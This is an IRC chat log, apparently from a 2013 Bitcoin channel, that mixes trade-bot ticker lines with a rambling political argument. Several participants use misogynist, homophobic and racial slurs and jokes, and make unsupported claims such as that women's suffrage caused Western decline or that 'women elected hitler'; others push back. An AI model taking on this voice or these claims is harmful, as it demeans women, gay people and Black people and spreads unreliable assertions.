[AMC-PT] 11 @ 0.002011 = 0.0221 BTC [+] Jul 03 23:15:04 probably mtgox Jul 03 23:15:11 http://womensspace.wordpress.com/2007/04/18/mary-winkler-abused-and-raped-by-pastor-husband/ Jul 03 23:15:16 Mary Winkler Was Abused and Raped by Pastor Husband | Women's Space Jul 03 23:15:18 "As far as photos go, in general, I don’t post men’s photos unless there is a good reason for it, because this is women’s space." Jul 03 23:15:31 total feminazi fest about how woman killing her husband is a heroine Jul 03 23:15:39 teh comments rock. Jul 03 23:16:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.048689 = 0.1948 BTC [+] Jul 03 23:16:27 this is a goldmine Jul 03 23:16:52 lol women's space Jul 03 23:16:54 3:02Pm April 18th comment... haha Jul 03 23:17:32 feminist hell : being forced to watch porn and take it in teh other way. Jul 03 23:17:39 i'm pretty sure she is a lesbian who is taking her inheritance to bora bora with her girlfriend. Jul 03 23:18:24 giving women the right to vote is the turning point that started the wests decline Jul 03 23:18:34 [BTCTC] [AMC-PT] 1 @ 0.002011 BTC [+] Jul 03 23:18:39 not really. women have nothing to do with it. Jul 03 23:18:43 ^ Jul 03 23:18:45 bullshit. Jul 03 23:18:50 it's just this impression that people should be catered to. Jul 03 23:19:08 it's people, dumbass, men and women are equally stupid. there is no prejudice in stupidity. clearly. Jul 03 23:19:10 i know more women with mettle than men, actually, and you can just as well say feminised redditors voting are the problem Jul 03 23:19:15 when men voted in US the man voted what was best for his family, when feminism started they encouraged the woman to oppose her husband Jul 03 23:19:20 so both votes cancelled each other out Jul 03 23:19:28 and you had the young single people deciding elections. Jul 03 23:19:32 this is a good theory on the surface but it doesn Jul 03 23:19:36 't hold up to examination Jul 03 23:19:39 i'm only 12 so i don't know anything about voting yet Jul 03 23:19:41 [BTCTC] [AMC-PT] 1023 @ 0.002044 = 2.091 BTC [+] Jul 03 23:19:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.048689 BTC [+] Jul 03 23:19:58 mircea_popescu: 10 years after women allowed to vote in US, nation suffers largest depression in history. Jul 03 23:20:11 if knowing about it or doing it changed anything you might be missing out, jcpham Jul 03 23:20:13 all welfare programs came after womens voting Jul 03 23:20:22 well... that's arguing as to meteorites and eclipses. Jul 03 23:20:24 obama won only from the womens vote Jul 03 23:20:31 something something electoral college Jul 03 23:20:36 but it doesn't matter who wins. Jul 03 23:20:39 not here Jul 03 23:20:48 the bank wins Jul 03 23:20:51 [BTCTC] [AMC-PT] 3 @ 0.002187 = 0.0066 BTC [+] Jul 03 23:20:54 McCain would have not done much different than Obama Jul 03 23:20:54 mircea_popescu: are you going to argue women think the exact same as men? Jul 03 23:20:59 welfare programs were there much before "women voting". take abstinence committees. Jul 03 23:21:17 no, i'm going to argue that women can be trained as well as men can, for your purposes. Jul 03 23:21:18 welfare programs were nearly none existent in US before womens sufferage Jul 03 23:21:22 and i'm arguing that from experience. Jul 03 23:22:01 [BTCTC] [S.DICE-PT] 30 @ 0.002348 = 0.0704 BTC [+] Jul 03 23:22:02 if a contrarian argues with a contrarian does this automatically make one of them correct? Jul 03 23:22:16 funny isn't it. Jul 03 23:22:30 jchpham: depend who is listneing Jul 03 23:22:52 i'm trying to listen but it sounds like charlie brown's mother Jul 03 23:22:56 mircea_popescu: facts are facts. 99% of the governments growth came after women were given the right to vote. Jul 03 23:23:14 [BTCTC] [BFMINES] 375 @ 0.004 = 1.5 BTC Jul 03 23:23:18 during the 200 years before the governments size stayed relatively constant and small Jul 03 23:23:20 bitcoinbust: correlation does not equate causation Jul 03 23:23:37 women elected hitler Jul 03 23:23:46 prussians Jul 03 23:24:12 washington women had the vote for like 50 years prior to the rest of the us. Jul 03 23:24:15 [BTCTC] [AMC-PT] 18 @ 0.002187 = 0.0394 BTC [+] Jul 03 23:24:23 What peterl said... Jul 03 23:24:24 washington state suffered no such extreme explosion of government Jul 03 23:24:46 ;;bcstats Jul 03 23:24:50 Current Blocks: 244632 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1319 blocks | Next Difficulty In About: 1 week, 0 days, 4 hours, 2 minutes, and 36 seconds | Next Difficulty Estimate: 24309510.5034 | Estimated Percent Change: 13.94017 Jul 03 23:24:51 state elections are useless Jul 03 23:25:07 women expanded the federal governments power to grandiose proportions Jul 03 23:25:30 its easier to sell women on the compassion of socalism then a man Jul 03 23:25:45 not at the time Jul 03 23:25:51 I dunno about that, in Michigan a couple years ago we had a large changeover in state politicians and the reforms put in place have mostly been positive Jul 03 23:25:55 cca 1880 state ballots were more important than federal. Jul 03 23:26:14 michigan is the first region in the modern world where a city has regressed back to farming. Jul 03 23:26:23 hardly call that positive. Jul 03 23:26:40 Detroit is a fucking hellhole, but the rest of the state is nice Jul 03 23:26:50 theres nothing in the rest of the state Jul 03 23:26:56 its sprawled out Jul 03 23:27:00 Have you ever been here? Jul 03 23:27:03 yes. Jul 03 23:27:06 many times Jul 03 23:27:14 are you talking about nature? Jul 03 23:27:16 [BTCTC] [ASICMINER-PT] 1 @ 4.7999 BTC [+] Jul 03 23:27:33 My stocks are performing poorly since you appeared here. You must be at fault. But seriously, correlation does not equal causation. The fact two phenomena occur around the same time doesn't mean they're related. Jul 03 23:27:49 Namworld still, after a lot of repeatedness... Jul 03 23:27:58 namworld its not a direct relationship. Jul 03 23:28:12 because it's a correlation. Jul 03 23:28:13 [BTCTC] [ASICMINER-PT] 1 @ 4.7999 BTC [+] Jul 03 23:28:14 detroit and every other major US city -> http://opinionator.blogs.nytimes.com/2013/01/26/the-rise-of-the-permanent-temp-economy/ Jul 03 23:28:15 you arent understanding. in most US households the wife votes opposite of the husband so they cancel each other out Jul 03 23:28:27 what you have left with is idiot single young people deciding, and they always lean towards more socialism Jul 03 23:28:37 .bait Jul 03 23:28:41 http://25.media.tumblr.com/c4c0c9b5786c1995b937508573bffe06/tumblr_mfitv80ZTR1qh8dpxo1_500.jpg Jul 03 23:28:51 "I suggest that Women follow Nature, Our Great Mother. When a badass male Grizzly Bear tries to come after a Grizzly Sow to get at her cubs for snack-time purposes, the Sow unloads on him with tooth, claw and Female Fury until he is beaten back. She goes after him again and again, until he not only knows to leave Her and her cubs alone, but also until She is able to completely drive him out of the area where She and He Jul 03 23:28:51 r cubs are. She fights like Hell, Destruction and Death, with every ounce of Power and Viciousness She can muster, because it is She and all other Sows– not the males they breed with– who are the True Guardians of the future generations of the Bear Nation." Jul 03 23:28:55 dude where do they sell feminists ? Jul 03 23:29:43 detroit regressed about 150 years in some areas Jul 03 23:29:53 i dont think there is a single example in modern history of that occuring Jul 03 23:30:04 Humans are much more closely related to Gorillas and Chimps than grizzly bears Jul 03 23:30:06 people went from producing advanced goods to farming tomatoes in 1 generation Jul 03 23:30:14 That is because of labor unions being too expensive, not women - dumbass Jul 03 23:30:27 Toyota and Honda made better cars Jul 03 23:30:27 i didnt say anything about women and detroit. Jul 03 23:30:41 That is why Detroit is a shithole Jul 03 23:30:42 first off detroit didnt just produce cars dumbass. Jul 03 23:30:48 peterl i don't think that matters. the rule of cool. Jul 03 23:30:50 yes they did dumbass Jul 03 23:30:53 it was the wealthiest city in the world in the 50's Jul 03 23:30:55 Then women didn't expand the federal government, the youth did, according to you. Jul 03 23:31:01 no they didnt they had large manufacturing of all sorts of products. Jul 03 23:31:15 labor unions Jul 03 23:31:16 the government killed US manufacturing in the 70's with excessive taxation and regulation Jul 03 23:31:28 labor unions were around beore the 50s jborkl. Jul 03 23:31:29 im with jborkl here. it was the us style unions, ie, the mob. Jul 03 23:31:32 Detroit Suburbs are still a nice place. The city is messed up. Jul 03 23:31:38 why do you think the South is more productive Jul 03 23:31:43 no labor unions Jul 03 23:31:48 the south is the poorest region in america. Jul 03 23:31:50 less Jul 03 23:31:53 its not more productive Jul 03 23:31:53 lol no Jul 03 23:31:56 [BTCTC] [AMC-PT] 18 @ 0.002187 = 0.0394 BTC [+] Jul 03 23:31:57 lol yes. Jul 03 23:32:01 lol nop Jul 03 23:32:05 largest welfare recipient states are republican south. Jul 03 23:32:08 i have a electrical contractor client that has union and non-union counterpart Jul 03 23:32:08 Detroit is better off? Jul 03 23:32:17 the non-union entity gets more jobs Jul 03 23:32:25 jborkl the only "southern" state that does anything decent is some parts of texas Jul 03 23:32:37 first smart thing you said yet. Jul 03 23:32:40 southern US states are dirt poor. Jul 03 23:32:42 mircea-popescu where I was going is we should all live the gorialla lifestyle of an old man who lives with several ladies who take care of his needs and he beats people up if they disagree with him Jul 03 23:32:44 Yes and we have plenty of money Jul 03 23:32:49 they arent more productive. Jul 03 23:32:56 [BTCTC] [TAT.ASICMINER] 24 @ 0.047301 = 1.1352 BTC [-] Jul 03 23:33:04 Colorado is just fine so id Florida Jul 03 23:33:09 so is Jul 03 23:33:12 peterl, I think bonobo is a better fit for me. Jul 03 23:33:33 lol forida is fine? Jul 03 23:33:39 what planet do you live on. Jul 03 23:33:40 Women voting has no bearing on why we do not produce steel and quality cars Jul 03 23:33:45 [BTCTC] [RSM] 5 @ 0.016 = 0.08 BTC [-] Jul 03 23:33:47 peterl im not sure how practicable that is. Jul 03 23:33:49 [BTCTC] [BITVPS] 10 @ 0.002399 = 0.024 BTC [+] Jul 03 23:33:49 [BTCTC] [BITVPS] 1 @ 0.0024 BTC [+] Jul 03 23:33:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0473 BTC [-] Jul 03 23:33:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.047298 = 0.3311 BTC [-] Jul 03 23:33:54 its a fucking dump anywhere except the coasts which are barricaded enclaves Jul 03 23:33:59 deadweasel free love for all! Jul 03 23:34:11 florida inland is dirt poor. Jul 03 23:34:28 colorado is barely populated. Jul 03 23:34:34 try again jborkl. Jul 03 23:34:35 Well South Texas is a desert, but you can pick and choose any part of a state and say it is shitty Jul 03 23:34:46 The average people all the over the place in all countries are poor, barring some rare exceptions. Jul 03 23:34:47 West texas is desert Jul 03 23:34:48 texas has a high concentration of tech firms Jul 03 23:34:57 but it also has major poverty Jul 03 23:35:08 major poverty as in? Jul 03 23:35:09 That's valid almost worldwide. Jul 03 23:35:17 exactly Jul 03 23:35:19 um extremely low incomes? Jul 03 23:35:27 like barely able to buy groceries? Jul 03 23:35:39 jbrokl you are talking out of your ass. Jul 03 23:35:41 that is a worldwide problem with people being not worth as much as they think they are Jul 03 23:35:50 ^ Jul 03 23:35:51 texas has some of the poorest districts in the united states Jul 03 23:35:54 And in any states there will be regional variations: Midland (MI) is a wonderful town, Saginaw is a shithole Jul 03 23:36:00 I think he means the kind of homes barely making it from paycheck to paycheck. Jul 03 23:36:16 [BTCTC] [DMS.MINING] 11 @ 0.0207 = 0.2277 BTC [-] Jul 03 23:36:27 there are lots of those everywhere. more in heavily populated areas. more to come. Jul 03 23:36:28 If you're single on minimum salary, managing ain't hard. If you got a family tho... Jul 03 23:36:30 we are in decline Jul 03 23:36:32 [BTCTC] [AMC-PT] 4 @ 0.002189 = 0.0088 BTC [+] Jul 03 23:36:37 what's the point again? Jul 03 23:36:38 http://www.censusscope.org/us/map_poverty.gif Jul 03 23:36:42 this is from 3 years ago Jul 03 23:36:46 err 13 years ago Jul 03 23:37:04 your argument was that Detroit was poor because women voted Jul 03 23:37:04 when US had like 4% unemployment and record high stock market Jul 03 23:37:07 seems central florida was doing fine then Jul 03 23:37:10 no it wasnt jborkl Jul 03 23:37:22 mircea_popescu: florida collapsed under the housing bubble Jul 03 23:37:28 better than california anyway Jul 03 23:37:29 stupid map, large red areas are virtually empty, or the appalachias. Jul 03 23:37:49 [BTCTC] [AMC-PT] 10 @ 0.002189 = 0.0219 BTC [+] Jul 03 23:38:02 it also matches slavery maps Jul 03 23:38:08 on the east side Jul 03 23:38:17 not really. women have nothing to do with it. Jul 03 23:38:17 [BTCTC] [AMC-PT] 4 @ 0.002189 = 0.0088 BTC [+] Jul 03 23:38:17 ^ Jul 03 23:38:17 bullshit. Jul 03 23:38:17 clearly it's the black people. Jul 03 23:38:28 https://lh3.ggpht.com/-OS8MmDJIH4E/UR7YM5gQzII/AAAAAAAABVc/NBjiKNme5FA/s1600/income_by_county_large.png Jul 03 23:38:30 ^ Jul 03 23:38:33 heavy slavery for the south still correlates to poorer areas. Jul 03 23:38:40 i wonder if it's really the black women! Jul 03 23:38:43 mystery solved! Jul 03 23:38:43 i think thats the most recent Jul 03 23:38:44 [BTCTC] [ASICMINER-PT] 1 @ 4.66245 BTC [-] Jul 03 23:39:04 floridas income is held up by enclave islands of filthy rich Jul 03 23:39:04 i'm just saying these areas on the map have a hundred reasons for their status, and a hundred more we don't know. Jul 03 23:39:12 they live on man made islands with private security forces Jul 03 23:39:15 [BTCTC] [ASICMINER-PT] 2 @ 4.7111 = 9.4222 BTC [+] Jul 03 23:39:16 and draw bridges lol Jul 03 23:39:20 [BTCTC] [ASICMINER-PT] 2 @ 4.725 = 9.45 BTC [+] Jul 03 23:39:24 [BTCTC] [ASICMINER-PT] 1 @ 4.799 BTC [+] Jul 03 23:39:45 anyone thats been in the US knows that most american wealth is grossly overstated. Jul 03 23:39:47 [BTCTC] [AMC-PT] 15 @ 0.0022 = 0.033 BTC [+] Jul 03 23:39:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.048 = 0.192 BTC [+] Jul 03 23:39:56 its a couple of enclaves scattered around the country Jul 03 23:40:02 no. Jul 03 23:40:03 of extreme wealthy Jul 03 23:40:03 100k a year. gezuz the inflartion hit bad. Jul 03 23:40:05 wow, this channel is active today, that spammer assbot can barely get more than two lines in in a row ;) Jul 03 23:40:29 [BTCTC] [AMC-PT] 6 @ 0.0022 = 0.0132 BTC [+] Jul 03 23:40:30 [BTCTC] [AMC-PT] 5 @ 0.0022 = 0.011 BTC [+] Jul 03 23:40:37 i ignored assbot weeks ago! ;) Jul 03 23:40:39 [BTCTC] [ASICMINER-PT] 2 @ 3.5 = 7 BTC [-] Jul 03 23:40:42 so when's the last time you got laid bitcoinbust ? Jul 03 23:40:48 2 nights ago Jul 03 23:40:57 was it any good ? Jul 03 23:40:58 local talent from montreal Jul 03 23:41:03 what was his name? Jul 03 23:41:07 Like I was saying, we need to embrace the Gorilla lifestyle and live within our means instead of thinking we are poor and wishing for the huge house Jul 03 23:41:08 lol Jul 03 23:41:14 ;) Jul 03 23:41:25 mircea: what about yourself? Jul 03 23:41:25 peterl: Jul 03 23:41:28 you got it. spot on. Jul 03 23:41:29 Oh, you're in Montreal? Jul 03 23:41:35 wait 100k/yr is wealthy now? Jul 03 23:41:37 a little earlier. Jul 03 23:41:38 Wat, live within our means? That's crazy talk. Jul 03 23:41:39 namworld until the end of the year Jul 03 23:41:43 wat wat wat Jul 03 23:41:43 we are resource RICH. we all our. Jul 03 23:41:47 mircea_popescu: how long did it take for the guy to cum? Jul 03 23:41:47 *are Jul 03 23:42:09 no, i did it wiff mah girlz. Jul 03 23:42:11 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Jul 03 23:42:22 whores are cheap in romania Jul 03 23:42:31 not mp's Jul 03 23:42:33 The reknown Montreal (Canada) or one of the small Montreals around the US? Jul 03 23:42:33 they are ? Jul 03 23:42:43 namworld: quebec Jul 03 23:42:46 fucking 30BTC just to join the whoreclub! Jul 03 23:42:53 Well so am I then. Jul 03 23:42:55 I bought an 8-chip "taobao" miner from someone in Romania. Jul 03 23:43:00 then you still have to buy the whores after... Jul 03 23:43:01 namworld: montreal is my favourite city in north america Jul 03 23:43:13 B0g4r7: how did it turn out? Jul 03 23:43:28 It did not survive the journey too well. Half of the heatsinks had been knocked off and were looks. Jul 03 23:43:29 Well for that I don't disagree. Jul 03 23:43:55 Once I remount the SMT thingie that got knocked off and put it all back together I'll be trying it out. Jul 03 23:44:06 bitcoin is a dead dog Jul 03 23:44:08 s/looks/loose/ Jul 03 23:44:14 under 1bil market cap Jul 03 23:44:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.03 = 0.75 BTC [-] Jul 03 23:44:44 bitcoin is on sale! Jul 03 23:44:44 Well I wouldn't call it dead. It was like 150 million in January. Jul 03 23:44:59 The 2+ billion market cap was the crazy thing. Jul 03 23:45:05 There is a letter here from a woman against suffrage: http://www.the-spearhead.com/2010/09/15/how-female-suffrage-destroyed-western-civilization/ Jul 03 23:45:21 All that is dying is the awful wild speculation. Jul 03 23:45:24 ;;ticker Jul 03 23:45:25 MtGox BTCUSD ticker | Best bid: 82.50000, Best ask: 82.99789, Bid-ask spread: 0.49789, Last trade: 82.99900, 24 hour volume: 47264.08256921, 24 hour low: 81.86753, 24 hour high: 91.20000, 24 hour vwap: 85.79193 Jul 03 23:45:27 For now I just mine more profitable alts and trade for BTC. Jul 03 23:45:28 that letter makes alot of valid points deadweasel Jul 03 23:45:32 seems about even to me. Jul 03 23:45:49 b0g4r7 what alts? Jul 03 23:46:03 TRC and PPC lately. Jul 03 23:46:10 B0g4r7: I hope you get it to work. Jul 03 23:46:49 Thx. deadweasel == bitweasel? Jul 03 23:46:51 you're sitting and chatting with a staled miner ?! Jul 03 23:47:06 nope Jul 03 23:47:13 Sad but true. Jul 03 23:47:17 Well, broke. Jul 03 23:47:53 yeah I can't do that, I fought for 2 days to get my gpus up, then 2 weeks to get them stable. the job after the job. in another few weeks, I'll be paying to mine. Jul 03 23:47:55 [BTCTC] [AMC-PT] 4 @ 0.0022 = 0.0088 BTC [+] Jul 03 23:48:19 [BTCTC] [AMC-PT] 3 @ 0.002 = 0.006 BTC [-] Jul 03 23:48:21 [BTCTC] [AMC-PT] 1 @ 0.0019 BTC [-] Jul 03 23:48:23 It looks like a ceramic inductor (is there such a thing?) on the board has a corner broken off too. I'm hoping it's OK. Jul 03 23:48:26 so I'll stop and use those cards for ltc or some wackadoo spam coin Jul 03 23:48:28 [BTCTC] [AMC-PT] 10 @ 0.0022 = 0.022 BTC [+] Jul 03 23:48:38 [BTCTC] [ASICMINER-PT] 1 @ 4.700002 BTC [+] Jul 03 23:48:48 if it's just ceramic use thermal glue on it. Jul 03 23:48:57 If I can find the missing piece. Jul 03 23:49:10 [BTCTC] [AMC-PT] 6 @ 0.002311 = 0.0139 BTC [+] Jul 03 23:49:27 there is such a thing, and it's never ok Jul 03 23:49:35 inductive capacitor i think is what they are. Jul 03 23:51:04 http://weknowmemes.com/wp-content/uploads/2012/07/stephen-fry-on-bullying.jpeg Jul 03 23:51:05 [BTCTC] [AMC-PT] 7 @ 0.002311 = 0.0162 BTC [+] Jul 03 23:51:09 http://i.imgur.com/ZapSfcJ.jpg Jul 03 23:51:10 10 more minutes until my long weekend begins. Jul 03 23:51:20 Then I'll have some time to work on the miners and such. Jul 03 23:51:21 [BTCTC] [ASICMINER-PT] 1 @ 4.726429 BTC [+] Jul 03 23:51:31 you should be ssh'ed in right now! Jul 03 23:51:41 that's how I did it. :) Jul 03 23:51:44 ahaha Jul 03 23:51:48 you guys having problems with gpus? Jul 03 23:51:57 Yea, well they need some hardware work first. Jul 03 23:52:02 i'm a whiz at the gpu mining Jul 03 23:52:12 I sold most all my GPUs now. Jul 03 23:52:15 yeah, they will be negative return in a few weeks for me at 6 cents kw/h Jul 03 23:52:30 i steal power from the orphanage Jul 03 23:52:30 B0g4r7: on the forums? Jul 03 23:52:34 across the street Jul 03 23:52:38 Naw, mostly locally. Jul 03 23:52:42 A few on the forums I guess. Jul 03 23:52:44 [BTCTC] [BITVPS] 10 @ 0.0029 = 0.029 BTC [+] Jul 03 23:52:55 [BTCTC] [BITVPS] 39 @ 0.0025 = 0.0975 BTC [-] Jul 03 23:52:55 jcpham I am reading through the article you linked, they talk alot about Kelly (my current employer) Jul 03 23:53:17 oh yeah... Jul 03 23:53:17 jcpham , and internet from the homeless shelter Jul 03 23:53:22 tbh I skimmed that one Jul 03 23:53:33 [BTCTC] [AMC-PT] 1 @ 0.002311 BTC [+] Jul 03 23:53:35 there were a few articles recently on the rise of temporary workers Jul 03 23:53:41 not sure which one i linked Jul 03 23:53:50 it can be useful. just drop a link here you don't want to read, then come back in 45 minutes. Jul 03 23:53:53 http://opinionator.blogs.nytimes.com/2013/01/26/the-rise-of-the-permanent-temp-economy/ Jul 03 23:53:56 The Rise of the Permanent Temp Economy - NYTimes.com Jul 03 23:53:57 [BTCTC] [TAT.ASICMINER] 12 @ 0.0475 = 0.57 BTC [+] Jul 03 23:54:02 that was an excellent article. Jul 03 23:54:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.047001 = 0.235 BTC [-] Jul 03 23:54:20 sometimes i link utter shit Jul 03 23:54:23 big deal in Texas. we ship these guys around like fucking sardines Jul 03 23:54:36 they seem to like it. Jul 03 23:54:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.047 = 0.235 BTC [-] Jul 03 23:54:53 it can be useful. just drop a link here you don't want to read, then come back in 45 minutes. <<< poor man's slavegirls, as provided by the chan. Jul 03 23:54:58 it's only bad in Alabama in certain areas Jul 03 23:55:05 In Dubai ppl were offended that they hauled the labor around in open trucks. Now they use box trucks which are 20 degrees hotter. Jul 03 23:55:17 i know! Jul 03 23:55:32 the trucks were alright. Jul 03 23:55:34 "Low-wage, temporary jobs have become so widespread that they threaten to become the norm. But for some reason this isn’t causing a scandal." Jul 03 23:55:42 well society is restructuring itself back to the norm Jul 03 23:55:56 if average joe is lucky enoufgh tyo retain the job of a butler good for him Jul 03 23:55:59 if not starvation. Jul 03 23:56:10 is jcpham the fag who thought he could make a bitcoin exchange in central park? Jul 03 23:56:19 mircea_popescu: we should all be able to live like kings! Jul 03 23:56:23 entitlement for the win Jul 03 23:56:26 facedesking Jul 03 23:56:26 ta daaa Jul 03 23:56:29 you should fund my socialism fun Jul 03 23:56:30 d Jul 03 23:56:36 hahah Jul 03 23:56:41 whose the buttonwood guy in here Jul 03 23:56:48 the funny thing is that even though I work for Kelly, their main example of such a company, my job is essentially permanent, just with crappy benefits Jul 03 23:56:50 fuckin' mjr Jul 03 23:56:50 you mean mjr_ ? Jul 03 23:56:54 i don't think he's gay. Jul 03 23:57:03 yea that guy was dumb Jul 03 23:57:10 damn, i've gone bonobo. Jul 03 23:57:21 yay, bonobo is great! Jul 03 23:57:30 i'm going to go "argue" with cute new neighbor. Jul 03 23:57:31 bonobo's fuck everything even couches Jul 03 23:57:35 they are worse than teenagers Jul 03 23:57:36 by the way, if women lose the vote what about teh fags ? them too ? Jul 03 23:57:45 [BTCTC] [TAT.ASICMINER] 48 @ 0.047001 = 2.256 BTC [+] Jul 03 23:57:48 no Jul 03 23:57:51 mircea: there an isignificant portion Jul 03 23:57:57 fags are actually fiscal conservatives. Jul 03 23:58:07 ^ Jul 03 23:58:09 what if women turn into lezzies to conserve their right to vote ? Jul 03 23:58:16 they already did Jul 03 23:58:21 a. ok then. Jul 03 23:58:28 women tend to vote based on a candidates appearance Jul 03 23:58:33 and the type of pet he owns Jul 03 23:58:36 unlike men. Jul 03 23:58:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.047 = 0.141 BTC [-] Jul 03 23:58:40 har har Jul 03 23:58:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.047499 BTC [+] Jul 03 23:59:01 "Yet employers had (and have) choices. Rather than squeezing workers, they could have invested in workers and boosted product quality, taking what economists call the high road toward more advanced manufacturing and skilled service work. " Jul 03 23:59:02 well most american men are feminine these days Jul 03 23:59:05 bwahaha that article kicks ass Jul 03 23:59:22 i can imagine the author yelling at his neighbour Jul 03 23:59:26 another more recent article on temp workers: http://nation.time.com/2013/06/27/the-4-am-army/print/ Jul 03 23:59:29 less gender bias Jul 03 23:59:30 "rather than fucking your gf you could have mowed my lawn!!!" Jul 03 23:59:35 its impossible for business to invest into plants when they lose up to 40% in taxes Jul 04 00:00:01 any savings from excess production are just taxed away Jul 04 00:00:30 hence the armies of useless lawyers accountants in the US. Jul 04 00:00:33 Out of all the stupid shit you said, you finally said something smart. Here is a cookie Jul 04 00:00:53 i don't think anyone's disputing the west is pretty much soviet-doomed. Jul 04 00:00:56 can't agree more Jul 04 00:01:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.0467 = 0.467 BTC [-] Jul 04 00:01:53 the wests decline started when people began listening to absurd nihilistic ideas from german philsophers instead of the classic roman thought Jul 04 00:02:10 95% of idiotic ideas came from germany in the last 150 years Jul 04 00:02:30 95% out of what total ? Jul 04 00:02:44 everything from state school indoctrination to marxism Jul 04 00:02:52 to nihilism is from germans Jul 04 00:02:55 to have a percent you need a total, which is a number. Jul 04 00:03:26 well id even go as far as 100% of idiotic ideas of structuring government came from germany Jul 04 00:03:33 even so. Jul 04 00:03:49 maybe 20? Jul 04 00:03:58 incidentally, don't you think it's a little unfair to impugn the sole sane german on the grounds you're too lazy to count ideas ? Jul 04 00:04:01 if indeed one exists. Jul 04 00:04:12 how is the german sane? Jul 04 00:04:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0474 = 0.1422 BTC [+] Jul 04 00:04:25 I'm the luckiest fuck... I made a purchase of BTC a week back for Coinbase with direct charge to my account. Turns out, some expense had gone out, cancelling the payment. It cost me $25 in fees; saved me several hundred due to price decline. Jul 04 00:04:32 ok, let's play this game. so let's count to twenty. Jul 04 00:04:34 mircea_popescu: have you ever played bioshock Jul 04 00:04:38 you are andrew ryan Jul 04 00:04:41 the quantification of energy would be one. you know who came up with it ? Jul 04 00:04:44 AM, from btctalk: " 58 shares just went down in one purchase @ 5.0, holy shit." -- CMMPro Jul 04 00:04:50 "IS A MAN NOT ENTITLED TO THE SWEAT FROM HIS BROW?!?!?" - mircea_popescu Jul 04 00:04:57 lol Jul 04 00:04:58 well more like Jul 04 00:05:13 mircea_popescu: im not talking about technology. Jul 04 00:05:13 "IS A MAN NOT ENTITLED TO THE COIN IN HIS WALLET?!?!?!?" - mircea_popescu Jul 04 00:05:17 [BTCTC] [ASICMINER-PT] 2 @ 3.5 = 7 BTC [-] Jul 04 00:05:21 but the quantification of energy is an idea Jul 04 00:05:27 and quite fundamental at that. Jul 04 00:05:36 im talking about philosophical ideas pertaining to government and society Jul 04 00:05:37 the wests decline started when people began listening to absurd nihilistic ideas from german philsophers instead of the classic roman thought // and when he got back on track, he stumbled into madness once again Jul 04 00:05:46 [BTCTC] [MININGCO.ETF] 2 @ 1.125 = 2.25 BTC [+] Jul 04 00:05:48 apocaly its fact. Jul 04 00:05:57 it is as much a philosophical idea as "nihilism" Jul 04 00:06:11 1 generation after prussia created state school system germany is in total war Jul 04 00:06:22 bitcoinbust, have you ever read Nietszche ? Jul 04 00:06:29 yea he was an idiot. Jul 04 00:06:29 lettuce get back on track here. we were counting ideas. Jul 04 00:06:32 well, they were in quite a few wars before that too Jul 04 00:06:36 you realize he infected himself with an STD? Jul 04 00:06:38 tiberius you are sucha master troll Jul 04 00:06:40 otherwise we just spin perpetually in a ball of cluelessness. Jul 04 00:07:03 you realize he infected himself with an STD? // can't be perfect, some of his thoughts were insightfull Jul 04 00:07:14 apocaly: nietszche is what led to hitler Jul 04 00:07:24 obsessed with super humans and other utter stupidity Jul 04 00:07:26 haha Jul 04 00:07:42 That is really getting the causal relationships quite confused Jul 04 00:08:08 is tiberius around anymore? Jul 04 00:08:10 last 100 years what other nation in europe has destroyed its currency more times then germany? caused more capital/human damage then germany? inflicted the world with marxism Jul 04 00:08:28 Bug this guy is so obviously tib Jul 04 00:08:30 I talked to a guy last night I thought was him at first, but then I began to doubt it Jul 04 00:08:36 he wasn't racist enough Jul 04 00:08:36 [BTCTC] [TAT.ASICMINER] 50 @ 0.047199 = 2.36 BTC [-] Jul 04 00:08:38 [BTCTC] [TAT.ASICMINER] 30 @ 0.0472 = 1.416 BTC [+] Jul 04 00:08:50 The germans got many of their ideas on eugenics from the Americans Jul 04 00:08:56 Bugpowder isn't it interesting how the more you interract with internet ppl the more you think ~9bn of the planet population are really the same one guy ? Jul 04 00:09:07 peterl: majority of tradtional americans are of german descent Jul 04 00:09:21 Convergence to particular behavior patterns that are universal? Jul 04 00:09:38 bugpowder what happend with you and mtgox? Jul 04 00:09:40 Chomsky and Pinker's new theory, the universal grammar of troll. Jul 04 00:09:46 some bullshit Jul 04 00:09:51 Bugpowder something like that. not even patterns of behaviour Jul 04 00:10:03 just attractors of thought. i think we're going to end up with a new myth explosion Jul 04 00:10:04 patterns of mental thought Jul 04 00:10:08 tiberius just figured out he could use webchat/tor to get around his banning Jul 04 00:10:09 we're in the pre-heroic age over here Jul 04 00:10:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.0472 = 0.1888 BTC [+] Jul 04 00:10:18 oh tib got banned? Jul 04 00:10:20 yeah Jul 04 00:10:26 I have missed so much Jul 04 00:10:27 greece cca 2500 bc is coming in a few years Jul 04 00:10:36 I thought this channel was ban-free Jul 04 00:10:42 2 bannings so far Jul 04 00:10:46 he was fucking annoying tho Jul 04 00:11:04 seriously ? ban -free ? Jul 04 00:11:16 mostly Jul 04 00:11:26 i think kako simply was doing the majority a favor Jul 04 00:11:29 who the hell decided that Jul 04 00:11:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.0472 = 0.944 BTC [+] Jul 04 00:11:44 kako is a loser. Jul 04 00:11:46 oh hai Jul 04 00:12:01 spends his days chitchatting up on forums Jul 04 00:12:01 we have a new egyptian president Jul 04 00:12:02 instead of promoting bitbet Jul 04 00:12:03 Apocaly yeah Jul 04 00:12:18 80% revenue decline over the last 60days on bitbet Jul 04 00:12:20 Bugpowder tghe army ousted the muslims. Jul 04 00:12:26 I know Jul 04 00:12:29 me too! Jul 04 00:12:31 yay for us Jul 04 00:12:34 fucking ravers in Tahrir Jul 04 00:12:41 love the lazers Jul 04 00:13:51 im waiting for when they just orgy it up Jul 04 00:14:02 i felt it coming in 2004, just by walking up and down the riverwalk, Jul 04 00:14:14 teh kids won't be dorks for much longer. Jul 04 00:14:24 whatever happend to mtgox 